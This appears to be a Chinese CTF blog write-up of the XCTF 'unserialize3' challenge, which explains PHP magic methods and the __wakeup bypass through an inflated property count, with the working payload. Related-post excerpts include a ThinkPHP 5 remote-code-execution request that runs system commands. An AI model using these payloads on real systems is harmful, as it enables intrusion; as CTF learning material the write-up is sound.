攻防世界16-unserialize3-Web

发表于2024-11-09|更新于2025-02-21|web

|总字数:441|阅读时长:1分钟|浏览量:|评论数:

攻防世界16-unserialize3-CTFWeb进阶

根据题意，很明显是反序列化，反序列化的知识可以自己查，PHP 反序列化基础 - Hello CTF (hello-ctf.com)也行

class xctf{
public $flag = '111';
public function __wakeup(){
   exit('bad requests');
}
?code=

以下是ctf中常用的方法：

__wakeup() //------ 执行unserialize()时，先会调用这个函数
__sleep() //------- 执行serialize()时，先会调用这个函数
__destruct() //---- 对象被销毁时触发
__call() //-------- 在对象上下文中调用不可访问的方法时触发
__callStatic() //-- 在静态上下文中调用不可访问的方法时触发
__get() //--------- 用于从不可访问的属性读取数据或者不存在这个键都会调用此法
__set() //--------- 用于将数据写入不可访问的属性
__isset() //------- 在不可访问的属性上调用isset()或empty()触发
__unset() //------- 在不可访问的属性上使用unset()时触发
__toString() //---- 把类当作字符串使用时触发
__invoke() //------ 当尝试将对象调用为函数时触发

也就是说我们要绕过wakeup方法，最后要在code中返回结果。

介绍一下(来自攻防世界wp)

<?php
class Student{
public $full_name = 'zhangsan';
public $score = 150;
public $grades = array();

function __wakeup() {
echo "__wakeup is invoked";
}
}

$s = new Student();
var_dump(serialize($s));
?>

输出为

1	O:7:"Student":3:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}}

这里补充一个知识点：当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

因此”Student”:3:改成5就能绕过

同样的在这题

把1改成2就行

payload=?code=O:4:”xctf”:2:{s:4:”flag”;s:3:”111”;}

文章作者: Matriy

文章链接: http://matriy330.github.io/c087ee8a/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Matriy's blog！

web 攻防世界

赞助

wechat
alipay

相关推荐

PHP2-CTFWeb进阶wp-攻防世界13

CTFWeb进阶wp-攻防世界-PHP2用了御剑和dirsearch扫描了一下发现什么也没扫描到，其它人好像有扫描到的，看了大佬的wp说有index.phps,去查了下。 phps 文件就是 php 的源代码文件，可以当作一个知识点记住，直接访问/index.phps,得到源码 123456789101112131415<?phpif("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit();}$_GET[id] = urldecode($_GET[id]);if($_GET[id] == "admin"){ echo "<p>Access granted!</p>"; echo "<p>Key: xxxxxxx </p>";}?>Can you anthenticate to...

CTF-Web入门wp-XCTF-(1-12)

CTF-Web入门wp-XCTF-(1-12)本人也是刚入门ctf-web系列，写一点wp 另外提供两个学习ctf的网站Hello CTF (hello-ctf.com)和Web 简介 - CTF Wiki (ctf-wiki.org) 入门题目地址：攻防世界 (xctf.org.cn) view_sourceF12查看Flag get_post使用HackBar get提交1...

baby_web-Web-攻防世界14

baby_web-CTFWeb进阶wp-攻防世界14页面显示1.php，可以先访问下源码和index.php，发现内容一致，再查看下cookie和header，看一下有没有藏flag，发现没。 dirsearch一下，发现访问index.php会重定向到1.php。抓包看一下查得flag

攻防世界15-baby_web-Web

baby_web-CTFWeb进阶wp-攻防世界15描述：云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹。直接看云平台报表中心有个id=1，http://61.147.171.105:53702/index.php?id=1 改成2，3，aaa都没有变化，尝试爆破一下(感觉做多了无非就这几种方式) 改成下面那样开始爆破找到flag

攻防世界18-Web_php_include-Web

攻防世界18-Web_php_include-CTFWeb进阶看名字可能是文件包含的题文件包含知识点：文件包含 - Hello CTF (hello-ctf.com)和文件包含漏洞全面详解-CSDN博客 123456789<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);}include($page);?> 解法1：小试牛刀：代码审计一下发现，php://会被删除掉，看一下能不能用其他的伪协议 data://text/plain,...

攻防世界17-php_rce-Web

攻防世界17-php_rce-CTFWeb进阶这题没什么头绪，还以为是个广告，提到了ThinkPHPV5，和phprce，可以去查一下找到了一些帖子，看一下解法1：发现了这么一个用法： /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 可以替换一些指令，ls查看没看到一些有用的信息，我用find指令去看看find / -type f -name ‘flag‘ /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -type f -name...

评论

数据加载中